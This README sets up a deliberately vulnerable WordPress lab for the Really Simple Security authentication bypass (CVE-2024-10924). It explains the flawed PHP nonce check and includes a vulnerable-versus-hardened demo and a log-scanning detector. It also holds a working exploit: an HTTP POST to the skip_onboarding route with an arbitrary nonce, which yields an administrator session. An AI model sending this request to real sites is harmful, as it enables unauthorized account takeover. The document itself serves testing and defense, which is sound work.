This is a vulnerable application to test the exploit for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924).
This application contains serious security vulnerabilities. Run it at your own risk! It is recommended to use a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet-facing server, as it will be compromised.
DISCLAIMER: I do not take responsibility for the way in which anyone uses this application. The only purpose of this application is to be a test scenario for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924) exploit and it should not be used maliciously. If your server is compromised via an installation of this application it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.
- CVE-ID: CVE-2024-10924
- Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
- Description: the vulnerability makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (it is disabled by default).
- Fix: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
- Wordfence bulletin: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
Here are the steps to set up the environment:
- Launch `./up.sh` to start the composition.
- Complete the installation of WordPress here: https://localhost:1337/wp-admin/install.php.
- Log in to WordPress.
- Go to "Plugins": https://localhost:1337/wp-admin/plugins.php.
- Click on "Activate" under the "Really Simple Security" plugin. DO NOT UPDATE IT, since we need the vulnerable version.
- Click on "Cancel" on the popup referring to SSL activation.
- Go to "Settings" > "Login Protection" > "Two-Factor Authentication" and, in the "Two-Factor Authentication" section, enable "Enable Two-Factor Authentication".
- Click the "Save" button.
The container will be called `vuln-wp-really-simple-security`.
To tear down the environment, use the `./down.sh` command, or the `./down_and_delete.sh` command to also remove the images and the database volume.
Looking at the fix, it is possible to understand that in the vulnerable version the `check_login_and_get_user()` function returned an error object in case of an invalid login nonce, without aborting the whole operation.
```php
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
    if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
        return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
    }
    /**
     * Get the user by the user ID.
     *
     * @var WP_User $user
     */
    $user = get_user_by( 'id', $user_id );
    return $user;
}
```
The caller, moreover, performed no check on the value returned by `check_login_and_get_user()` (line 277) and simply proceeded to call `authenticate_and_redirect()` (line 278) with the same user ID received from the request input.
```php
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
    $parameters = new Rsssl_Request_Parameters( $request );
    // As a double we check the user_id with the login nonce.
    $user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
    return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}
```
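The following is an added illustration, not code from the plugin or from this repository: it places the vulnerable control flow quoted above next to one possible hardened variant, so the difference between returning an error and acting on it is visible when run. The WordPress classes and functions involved (`WP_User`, `WP_REST_Response`, `get_user_by()`, the nonce check and `authenticate_and_redirect()`) are replaced by minimal constructed stand-ins, and the hardened variant is an illustrative fix, not the patch actually shipped in 9.1.2.

```php
<?php
// Added illustration, not the plugin's own code: the vulnerable control flow quoted in
// this README next to one possible hardened variant. The WordPress classes and
// functions involved are replaced by minimal constructed stand-ins so the file runs
// from the CLI:  php skip_onboarding_demo.php

// ---- constructed stand-ins for the WordPress / plugin pieces ----
class WP_User {
    public function __construct(public int $ID, public string $user_login) {}
}
class WP_REST_Response {
    public function __construct(public $data, public int $status = 200) {}
}
function get_user_by(string $field, int $id): ?WP_User {
    $users = [1 => new WP_User(1, 'admin'), 2 => new WP_User(2, 'editor')]; // constructed user table
    return $users[$id] ?? null;
}
// Stand-in for Rsssl_Two_Fa_Authentication::verify_login_nonce(): a real nonce is issued
// only after the first factor succeeded; here a single constructed value per user.
function verify_login_nonce(int $user_id, string $nonce): bool {
    return hash_equals('constructed-valid-nonce-for-user-' . $user_id, $nonce);
}
// Stand-in for the plugin's authenticate_and_redirect(): reports which user got a session.
function authenticate_and_redirect(int $user_id, string $redirect_to): WP_REST_Response {
    return new WP_REST_Response(['logged_in_as' => $user_id, 'redirect_to' => $redirect_to], 200);
}

// ---- vulnerable pattern (same shape as the excerpt above) ----
function vulnerable_check(int $user_id, string $nonce) {
    if (!verify_login_nonce($user_id, $nonce)) {
        // The error response is returned to the caller, but execution does not stop.
        return new WP_REST_Response(['error' => 'Invalid login nonce'], 403);
    }
    return get_user_by('id', $user_id);
}
function vulnerable_skip_onboarding(array $params): WP_REST_Response {
    $user = vulnerable_check((int)$params['user_id'], (string)$params['login_nonce']);
    // BUG: $user is never inspected; the session is created from the raw request user_id.
    return authenticate_and_redirect((int)$params['user_id'], (string)$params['redirect_to']);
}

// ---- hardened pattern (one possible fix, not the plugin's actual patch) ----
function hardened_check(int $user_id, string $nonce): ?WP_User {
    if (!verify_login_nonce($user_id, $nonce)) {
        return null; // a failed nonce check yields no user object at all
    }
    return get_user_by('id', $user_id);
}
function hardened_skip_onboarding(array $params): WP_REST_Response {
    $user = hardened_check((int)$params['user_id'], (string)$params['login_nonce']);
    if (!$user instanceof WP_User) {
        // Abort here: no session is created unless the nonce verified for this user.
        return new WP_REST_Response(['error' => 'Invalid login nonce'], 403);
    }
    // Authenticate the user object that passed verification, not the raw input value.
    return authenticate_and_redirect($user->ID, (string)$params['redirect_to']);
}

// Constructed request body matching the one in this README: a bogus nonce for user ID 1.
$request = ['user_id' => 1, 'login_nonce' => '133333337', 'redirect_to' => '/wp-admin/'];
foreach (['vulnerable' => 'vulnerable_skip_onboarding', 'hardened' => 'hardened_skip_onboarding'] as $label => $fn) {
    $resp = $fn($request);
    printf("%-10s -> HTTP %d %s\n", $label, $resp->status, json_encode($resp->data));
}
```

Running the file shows the vulnerable path answering 200 with a session for user 1 despite the bogus nonce, while the hardened path answers 403. The two points that matter are that the caller must stop when the check fails, and that the ID passed on to authentication should come from the verified user object rather than from the request.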
To exploit the vulnerability, a request like the following is sufficient.
```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```
Then set the returned session cookies in the browser accordingly.
The `user_id` must be the ID of the target user, while the `login_nonce` can be anything, since a wrong value won't block the process.
An exploit script in Python can be found here.
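On the defensive side, the request above is easy to spot in web server logs. The following added example (not part of this repository or of the plugin) scans constructed access-log lines in combined format for POSTs to the `skip_onboarding` REST route, covering both the `?rest_route=` query form used in the request above and the `/wp-json/` pretty-permalink form. Legitimate traffic to this route comes only from the plugin's own Two-Factor onboarding screen during login, so POSTs from scripted clients or without a preceding login are worth reviewing.

```php
<?php
// Added example, not part of the original README: flag access-log entries that POST to
// the skip_onboarding REST route. The log lines are constructed (Apache/nginx combined
// format); the route string is the one from the request shown in this README.
// Run with:  php find_skip_onboarding.php

const SKIP_ONBOARDING_ROUTE = '/reallysimplessl/v1/two_fa/skip_onboarding';

// Combined log format: client, ident, user, [time], "METHOD target PROTO", status, ...
const LOG_LINE = '~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})~';

/** Returns one record per POST whose target resolves to the skip_onboarding route. */
function find_skip_onboarding_hits(array $lines): array {
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match(LOG_LINE, $line, $m)) {
            continue; // not a request line in the expected format
        }
        [, $ip, $time, $method, $target, $status] = $m;
        // Decode %2F and friends so an encoded spelling of the route is not missed.
        $target = rawurldecode($target);
        $is_route = str_starts_with($target, '/wp-json' . SKIP_ONBOARDING_ROUTE)   // pretty permalinks
                 || str_contains($target, '?rest_route=' . SKIP_ONBOARDING_ROUTE); // query form
        if ($method === 'POST' && $is_route) {
            $hits[] = ['ip' => $ip, 'time' => $time, 'status' => (int)$status, 'target' => $target];
        }
    }
    return $hits;
}

// Constructed sample: one hit via the query form, one via /wp-json/, two benign requests.
$sample = [
    '203.0.113.7 - - [18/Nov/2024:10:15:01 +0000] "GET /wp-login.php HTTP/1.1" 200 4512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Nov/2024:10:15:03 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 312 "-" "python-requests/2.32.3"',
    '198.51.100.9 - - [18/Nov/2024:10:16:40 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 403 62 "-" "curl/8.5.0"',
    '192.0.2.5 - - [18/Nov/2024:10:17:02 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9911 "-" "Mozilla/5.0"',
];

foreach (find_skip_onboarding_hits($sample) as $hit) {
    // On an unpatched site a 200 here means a session was issued regardless of the nonce;
    // a 403 means the nonce check held (patched site or a rejected attempt).
    $verdict = $hit['status'] === 200 ? 'SESSION ISSUED' : 'rejected';
    printf("%s %s HTTP %d %s  %s\n", $hit['time'], $hit['ip'], $hit['status'], $verdict, $hit['target']);
}
```

The script reports the two POSTs and ignores the benign GETs. Access logs do not carry request bodies, so the `user_id` targeted is not visible here; pairing a hit with the plugin's own login records, or with an unexpected administrator session created at the same time, is the next step when triaging a 200 on a site that was still running a vulnerable version.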
- Antonio Francesco Sardella - implementation - m3ssap0
This project is licensed under the Unlicense - see the LICENSE file for details.
- István Márton, the security researcher who discovered the vulnerability.